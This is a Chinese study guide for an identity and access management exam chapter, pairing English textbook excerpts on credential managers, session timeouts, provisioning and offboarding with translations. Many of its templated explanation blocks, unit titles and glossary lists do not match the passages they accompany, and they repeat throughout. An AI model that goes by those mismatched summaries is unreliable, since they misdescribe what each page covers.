万维网联盟(W3C)于2019年1月发布了凭据管理一级API。 许多网页浏览器 已采用该API进行凭据管理。 该API为开发者提供了若干可编程实现的好处: 登录后提供存储用户凭据的功能 显示凭据选择器,允许用户跳过登录表单 在后续访问时自动登录用户,除非用户已退出登录 一些联合身份管理解决方案使用凭据管理 API。 这使得不同的网页应用能够 通过联合身份提供商实现单点登录(SSO)解决方案。 例如,如果您拥有 Google 或 Facebook 账户,您可以使用其中之一登录 Zoom。 身份即服务(IDaaS)是一种第三方服务,提供身份和访问管理(IAM)。 IDaaS 有效为云环境提供单点登录(SSO)功能,尤其适用于内部客户端访问 基于云的软件即服务(SaaS)应用。 Google 通过其口号“一个 Google 账户 通用于所有 Google 服务”来实现这一点。 用户只需登录一次自己的 Google 账户,即可访问多个 Google 云应用,无需再次登录。 另一个例子是 Microsoft 365,它将 Office 应用程序作为安装应用和 SaaS 应用的组合提供。

用户在其设备上安装了完整的 Office 桌面应用程序,并可 通过 OneDrive 连接到云存储。 这允许用户从多个设备编辑和共享文件。 当 人们在家中使用 Microsoft 365 时,Microsoft 提供 IDaaS,使用户能够通 过云端身份验证访问其 OneDrive 数据。 当员工在企业内部使用 Microsoft 365 时,管理员可以将网络与第三方服务 集成。 例如,Delinea 提供与 Microsoft Active Directory 集成的第三方服 务。 配置完成后,用户登录域即可访问 Microsoft 365 云资源,无需再次登 录。 凭据管理器应用 Windows 在控制面板中包含凭据管理器小程序。 当用户在浏览器或 Windows 应用程序中输入凭据时,凭据

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 36 / PDF P952

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Manager offers to save them. It encrypts the credentials and stores them. When a user returns to the website or opens the application, it retrieves the credentials from the Credential Manager. Third-party credential management systems, known as password vaults, are also available. For example, KeePass is a freeware tool that allows you to store your credentials. Credentials are stored in an encrypted database, and users can unlock the database with a master password. Once the database is unlocked, users can easily copy their passwords to paste into a website form. It's also possible to configure the app to enter the credentials automatically into the web page form.

Of course, it's important to use a strong master password to protect all the other credentials. Scripted Access Scripted access or logon scripts establish communication links by providing an automated process to transmit login credentials at the start of a login session. Scripted access can often simulate SSO even though the environment still requires a unique authentication process to connect to each server or resource. Scripts can implement SSO in environments where true SSO technologies are not available. Scripts and batch files should be stored in a protected area because they usually contain access credentials in cleartext.

Session Management When you're using any type of authentication system, it's important to use session management methods to prevent unauthorized access. This includes sessions on regular computers such as desktop PCs and within online sessions with an application. Desktop PCs and laptops include screen savers. These change the display when the computer isn't in use by displaying random patterns or different pictures or simply blanking the screen. Screen savers protected the computer screens of older computers, but new displays don't need them. However, they're still used, and screen savers have a password-protect feature that can be enabled.

This feature displays the logon screen and forces the user to authenticate again before exiting the screen saver. Screen savers have a time frame in minutes that you can configure. They are commonly set between 10 and 20 minutes. If you set it for 10 minutes, it will activate after 10 minutes. This requires users to authenticate again if the system is idle for 10 minutes or longer.

中文直译 / 整理

管理器会提示保存它们。 它会加密凭据并进行存储。 当用户返回网站或打开 应用程序时,它会从凭据管理器中检索凭据。 第三方凭证管理系统,又称密码保险库,也可使用。 例如,KeePass 是一款 免费工具,允许您存储凭证。 凭证存储在加密数据库中,用户可以使用主密码 解锁数据库。 一旦数据库被解锁,用户便可轻松复制密码并粘贴到网站表单中。 还可以配置应用程序,使其自动将凭证填入网页表单。 当然,使用强主密码来 保护所有其他凭证非常重要。 脚本化访问 脚本化访问或登录脚本通过在登录会话开始时提供自动化流程来传输登录凭证, 从而建立通信链接。 脚本化访问通常可以模拟单点登录(SSO),即使环境仍 需要为每个服务器或资源执行独立的认证过程。 在无法使用真正单点登录技术 的环境中,脚本可以实现单点登录。 由于脚本和批处理文件通常以明文形式包 含访问凭证,因此应将其存储在受保护的区域中。 会话管理 当您使用任何类型的认证系统时,使用会话管理方法以防止未经授权的访问非 常重要。 这包括在台式机等普通计算机上的会话,以及在应用程序中的在线会 话。 台式机和笔记本电脑包含屏幕保护程序。

当计算机未使用时,屏幕保护程序会 通过显示随机图案、不同图片或仅黑屏来改变显示内容。 屏幕保护程序曾用于 保护旧式计算机的屏幕,但新型显示器已不需要它们。 然而,它们仍被广泛使 用,且屏幕保护程序具有可启用的密码保护功能。 此功能会显示登录屏幕,并 强制用户在退出屏幕保护程序前重新进行身份验证。 屏幕保护程序有一个可配置的分钟数时间范围,通常设置为10到20分钟之间。 如果将其设置为10分钟,则在10分钟后激活。 这要求用户在系统空闲10分钟或 更长时间后重新进行身份验证。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 37 / PDF P953

第 953 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Secure online sessions will typically terminate after some time too. For example, if you establish a secure session with your bank but don't interact with the session for 10 minutes, the application will typically log you off. In some cases, the application gives you a notification saying it will log you off soon. These notifications usually allow you to click on the page so that you stay logged on. If developers don't implement these automatic logoff capabilities, it allows a user's browser session to remain open with the user logged on.

Even if the user closes a browser tab without logging off, it can potentially leave the browser session open, leaving the user's account vulnerable to an attack if someone else accesses the browser. The Open Worldwide Application Security Project (OWASP) publishes many different “cheat sheets” that provide application developers' specific recommendations. The Session Management Cheat Sheet provides information about web sessions and various methods used to secure them. URLs change, but you can find the cheat sheet by using the search feature at http://owasp.org. Developers commonly use web development frameworks to implement session management.

These are used worldwide and are regularly updated. The framework creates a session identifier at the beginning of the session. This identifier is included in every HTTP request throughout the session. It's possible to force the use of Transport Layer Security (TLS) to ensure the entire session (including the identifier) is encrypted. These frameworks also include methods to expire sessions. Developers choose the timeout periods, but high-value applications such as applications accessing financial data typically have timeout ranges of 2 to 5 minutes. Lowvalue applications typically have timeout ranges of 15 to 30 minutes.

Managing the Identity and Access Provisioning Life Cycle The identity and access provisioning life cycle refers to the creation, management, review/audit, and deletion of accounts. Although these activities may seem mundane, they are essential to a system's access control capabilities. Without properly defined and maintained user accounts, a

中文直译 / 整理

安全的在线会话通常也会在一段时间后终止。 例如,如果您与银行建立了安 全会话,但在10分钟内未与会话进行交互,应用程序通常会自动注销您。 在 某些情况下,应用程序会给出通知,告知您即将被注销。 这些通知通常允许 您点击页面以保持登录状态。 如果开发人员未实现这些自动注销功能,则可 能导致用户的浏览器会话保持打开状态,用户仍处于登录状态。 即使用户在 未注销的情况下关闭了浏览器标签页,也可能导致浏览器会话保持打开,如 果其他人访问该浏览器,用户的账户可能会面临被攻击的风险。 开放网络应用安全项目(OWASP)发布了多种不同的“速查表”,为 应用程序开发人员提供具体建议。 会话管理速查表提供了有关网页会话及其 各种安全方法的信息。 URL 会更改,但您可以通过访问 http://owasp.org 上的搜索功能找到该速查表。 开发人员通常使用 Web 开发框架来实现会话管理。 这些框架在全球范围内使 用,并定期更新。 框架在会话开始时创建一个会话标识符。 该标识符包含在会 话期间的每个 HTTP 请求中。 可以强制使用传输层安全协议(TLS),以确保 整个会话(包括标识符)被加密。 这些框架还包括使会话过期的方法。

开发人员选择超时周期,但访问财务数据 等高价值应用程序通常具有 2 到 5 分钟的超时范围。 低价值应用程序通常具有 15 到 30 分钟的超时范围。 管理身份和访问配置生命周期 身份和访问供应生命周期 identity and access provisioning life cycle 指的是 账户的创建、管理、审查/审计和删除。 尽管这些活动可能看似平凡,但它们 对于系统的访问控制能力至关重要。 如果没有正确定义和维护的用户账户,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 953 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 38 / PDF P954

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

system is unable to establish accurate identity, perform authentication, provide authorization, and track accountability. As mentioned previously, identification occurs when a subject claims an identity. This identity is most commonly a user account, but it also includes computer accounts and service accounts. Provisioning and Onboarding An organization typically has an onboarding process after hiring new employees. This includes creating the user account and provisioning it with all the privileges the employee will need in their new job. Creating new user accounts is usually a simple process, but the process must be protected and secured via organizational security policy procedures.

User accounts should not be created at an administrator's whim or in response to random requests. Rather, proper provisioning ensures that personnel follow specific procedures when creating accounts. The initial creation of a new user account is often called an enrollment or registration. The only item that must be provided is a username or a unique identifier. However, based on an organization's established processes, it typically includes multiple details on the user, such as the user's full name, email address, and more. When an organization uses biometric methods of authentication, biometric data is also collected and stored during this enrollment process.

It is also critical that the new hire's identity is proved through whatever means an organization deems necessary and sufficient. Photo ID, birth certificate, background check, credit check, security clearance verification, FBI database search, and even reference checks are all valid forms of verifying a person's identity before enrolling them in any secured system. Many organizations have automated provisioning systems. For example, once a person is hired, the HR department completes initial identification and inprocessing steps and then forwards a request to the IT department to create an account.

IT personnel enter information such as the employee's name and their assigned department via an application. The application then creates the account using predefined rules. Automated provisioning systems create accounts consistently, such as always creating usernames the same way and treating duplicate usernames consistently. If the policy dictates that usernames include first and last names, then the application will create a username as suziejones for a user named Suzie Jones. If the organization

中文直译 / 整理

系统将无法建立准确的身份、执行身份验证、提供授权和追踪责任。 如前所述, 识别发生在主体声明身份时。 此身份最常见的是用户账户,但也包括计算机账 户和服务账户。 配置与入职 组织在招聘新员工后通常会有一个入职流程。 这包括创建用户账户,并为其 配置员工在新岗位上所需的所有权限。 创建新用户账户通常是一个简单的过程,但该过程必须通过组织的安全策略程 序进行保护和加固。 用户账户不应由管理员随意创建,或仅因随机请求而创建。 相反,正确的配置确保人员在创建账户时遵循特定的流程。 新用户账户的初始创建通常称为注册或登记。 唯一必须提供的信息是用户名 或唯一标识符。 然而,根据组织的既定流程,通常还包括用户的多项详细信 息,例如用户的全名、电子邮件地址等。 当组织使用生物识别认证方法时, 生物识别数据也会在此注册过程中被收集和存储。 同样关键的是,必须通过组织认为必要且充分的任何方式验证新员工的身份。 照片身份证、出生证明、背景调查、信用调查、安全许可验证、FBI数据库 查询,甚至推荐人核查,都是在将其纳入任何安全系统之前验证个人身份的 有效方式。 许多组织拥有自动化配给系统。

例如,一旦员工被录用,人力资源部门会完成 初步的身份识别和入职流程,然后向IT部门提交创建账户的请求。 IT人员通过 应用程序输入员工姓名和所属部门等信息。 应用程序随后根据预定义规则创建 账户。 自动化配给系统会一致地创建账户,例如始终以相同方式创建用户名, 并一致处理重复用户名。 如果政策规定用户名需包含姓氏和名字,则应用程序 会为名为Suzie Jones的用户创建用户名suziejones。 如果组织

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

问责性:问责性要求能把行为绑定到具体主体。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

问责依赖识别、认证、授权、审计和记账共同工作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 39 / PDF P955

第 955 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

hires a second employee with the same name, then the second username might be suziejones2. If the organization is using groups (or roles), the application can automatically add the new user account to the appropriate groups based on the user's department or job responsibilities. The groups will already have appropriate privileges assigned, so this step provisions the account with appropriate privileges. Provisioning also includes issuing hardware such as laptops, mobile devices, hardware authenticators, and smartcards to employees. It's important to keep accurate records when issuing hardware to employees.

After provisioning employees with accounts and any hardware they need, organizations follow up with onboarding processes. Chapter 2, “Personnel Security and Risk Management Concepts,” introduced onboarding processes.

Onboarding processes include items such as the following: Having them read and sign the organization's acceptable use policy (AUP) Explaining security best practices, such as how to avoid malware infections from emails Reviewing the organization's mobile device policy, if applicable Ensuring that the employee's computer is operational and that the employee can log on Helping the employee configure a password manager, if available Assisting the employee with configuring 2FA, if available Explaining how to access help desk personnel for further assistance Showing the employee how to access, share, and save resources These onboarding items help set up a new employee for a successful start.

Some of them may seem unnecessary, especially for employees working with the organization for a while. Consider an organization that uses nonpersistent virtual desktops. When the user logs off, all data and settings are lost. A new employee can spend a day creating and saving files, only to come back the next day and find that everything is gone.

中文直译 / 整理

雇佣了第二位同名员工,则第二个用户名可能是suziejones2。 如果组织使用组(或角色),应用程序可以根据用户的部门或工作职责自动 将新用户账户添加到相应的组中。 这些组已经分配了适当的权限,因此此步 骤为账户配置了适当的权限。 配置还包括向员工发放硬件,例如笔记本电脑、移动设备、硬件认证器和智能 卡。 在向员工发放硬件时,保持准确的记录非常重要。 为员工配置账户和所需硬件后,组织会跟进入职流程。 第2章“人员安全与风 险管理概念”介绍了入职流程。 入职流程包括以下内容: 让员工阅读并签署组织的可接受使用政策(AUP) 解释安全最佳实践,例如如何避免通过电子邮件感染恶意软件 审查组织的移动设备政策(如适用); 确保员工的计算机正常运行 且员工能够登录 帮助员工配置密码管理器(如可用)协助员工配置双因素认 证(如可用) 解释如何联系帮助台人员以获取进一步协助向员工展示如何访问、共 享和保存资源 这些入职事项有助于为新员工的成功起步做好准备。 其中一些事项可能看起来 没有必要,尤其是对于已在组织中工作一段时间的员工。 考虑一个使用非持久性虚拟桌面的组织。 当用户注销时,所有数据和设置都会 丢失。

一名新员工可能花费一整天时间创建和保存文件,但第二天回来时却发 现一切都不见了。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 955 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 40 / PDF P956

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Deprovisioning and Offboarding Organizations implement deprovisioning and offboarding processes when employees leave an organization. This includes when an employee is terminated for cause, is laid off, or leaves under the best of conditions. These same processes can be used when an employee transfers to a different department or location within the same organization. Chapter 2 covers onboarding, transfers, and termination processes in the context of security policies and procedures. This section reviews them in the context of an identity and access provisioning life cycle. The easiest way to deprovision an account is to delete it, sometimes referred to as account revocation.

This process removes all access that the employee had while employed. However, it may also remove access to the user's data. For example, if the user encrypted data, the user account may have the only access to the decryption key to decrypt the data. Many organizations choose to disable the account when the employee leaves. Supervisors can then review the user's data and determine if anything is needed before deleting the account. If some data is encrypted, administrators can change the user's password and give the supervisor the new password. The supervisor can now log on as the ex-employee and decrypt the data.

Organizations typically have policies in place to delete these disabled accounts within 30 days, but the time limit can vary depending on the organization's needs. If a terminated employee retains access to a user account after the exit interview, the risk for sabotage is very high. Even if the employee doesn't take malicious action, other employees may be able to use the account if they discover the password. Logs will record the activity in the terminated employee's name instead of the person actually performing the malicious activity. Deprovisioning includes collecting any hardware issued to an employee, such as laptops, mobile devices, and authenticator devices.

This process is a lot easier if an organization keeps accurate records of what they issue to employees.

中文直译 / 整理

撤销与离职处理 当员工离开组织时,组织会实施撤销权限和离职流程。 这包括员工因故被解雇、 被裁员或在最佳条件下离职的情况。 这些相同的流程也可用于员工在同一组织 内调往其他部门或地点时。 第2章在安全策略和程序的背景下涵盖了入职、调岗和终止流程。 本 节将在身份和访问权限生命周期的背景下审查这些流程。 撤销账户最简单的方法是删除账户,有时称为账户撤销。 此过程会移除员工在 职期间的所有访问权限。 然而,它也可能导致用户数据的访问权限丢失。 例如, 如果用户加密了数据,则用户账户可能是解密数据所需解密密钥的唯一访问途 径。 许多组织在员工离职时选择禁用账户。 主管随后可以审查用户的数据,并在删 除账户前确定是否需要保留某些内容。 如果部分数据被加密,管理员可以更改 用户的密码,并将新密码提供给主管。 主管现在可以以离职员工的身份登录并 解密数据。 组织通常有政策规定在30天内删除这些已禁用的账户,但具体时限 可能因组织需求而异。 如果离职员工在离职面谈后仍保留对用户账户的访问权限,则遭受破坏的风险 极高。 即使该员工未采取恶意行动,其他员工若发现密码,也可能使用该账户。 日志将记录为离职员工的姓名,而非实际执行恶意操作的人员。

撤销流程包括收回发放给员工的所有硬件,例如笔记本电脑、移动设备和身份 验证设备。 如果组织能够准确记录发放给员工的物品,这一过程会容易得多。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 41 / PDF P957

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

It's also important to terminate employee benefits as part of the offboarding process. Without processes in place to do so, the organization may continue to pay for benefits even after employees leave. As an example, the human resource management system used by the University of Wisconsin failed to terminate health insurance premiums for 924 ex-employees several years ago. An audit discovered that they paid about $8 million before it was discovered. Role Definition and Transition During the lifetime of any organization, employee responsibilities will change. Many times, this is just a simple transfer to a different position.

Other times an organization may create a completely different job role. When they do so, it's important to define the new role and the privileges needed by employees in the role. As an example, imagine an organization decides to start selling items with an e-commerce site hosted on a new Linux server running Apache. Developers will write and maintain the code for the site, and administrators will manage the server. If they don't already have website developers and Linux administrators, they may decide to create two new roles to support this project. They would also define the privileges needed for these new roles and how they plan on assigning the privileges, such as with groups.

Account Maintenance Throughout the life of a user account, ongoing maintenance is required. Organizations with static organizational hierarchies and low employee turnover or promotion will conduct significantly less account administration than an organization with a flexible or dynamic organizational hierarchy and high employee turnover and promotion rates. Most account maintenance deals with altering rights and privileges. Procedures similar to those used when creating new accounts should be established to govern how access is changed throughout the life of a user account. Unauthorized increases or decreases in an account's access capabilities can cause serious security repercussions.

Account Access Review Administrators periodically review accounts to ensure they don't have excessive privileges. Account reviews also check to ensure accounts comply

中文直译 / 整理

在离职流程中,终止员工福利也非常重要。 如果没有相应的流程执行此操作, 组织可能在员工离职后仍继续支付福利费用。 例如,几年前,威斯康星大学使 用的人力资源管理系统未能终止924名前员工的健康保险保费。 一次审计发现, 他们在发现问题之前已支付了约800万美元。 角色定义与转换 在任何组织的生命周期中,员工的职责都会发生变化。 很多时候,这仅仅是简 单地调换到另一个职位。 其他时候,组织可能会创建一个完全不同的岗位。 当 他们这样做时,重要的是要明确定义新角色以及该角色所需员工的权限。 举个例子,假设一个组织决定通过运行 Apache 的新 Linux 服务器开设一个 电子商务网站来销售商品。 开发人员将编写和维护网站代码,而管理员将管理 服务器。 如果他们目前还没有网站开发人员和 Linux 管理员,他们可能会决定 创建两个新角色来支持该项目。 他们还会明确定义这些新角色所需的权限,以 及如何分配这些权限,例如通过组的方式。 账户维护 在用户账户的整个生命周期中,都需要持续的维护。 拥有静态组织架构且员工 流动率或晋升率较低的组织,其账户管理量将远低于拥有灵活或动态组织架构 且员工流动率和晋升率较高的组织。

大多数账户维护工作涉及更改权限和特权。 应建立与创建新账户时所用程 序相似的流程,以规范用户账户生命周期内访问权限的变更。 未经授权的 访问权限增加或减少可能导致严重的安全后果。 账户访问审查 管理员会定期审查账户,以确保其没有过度的权限。 账户审查还会检查账户是否 符合

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 42 / PDF P958

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

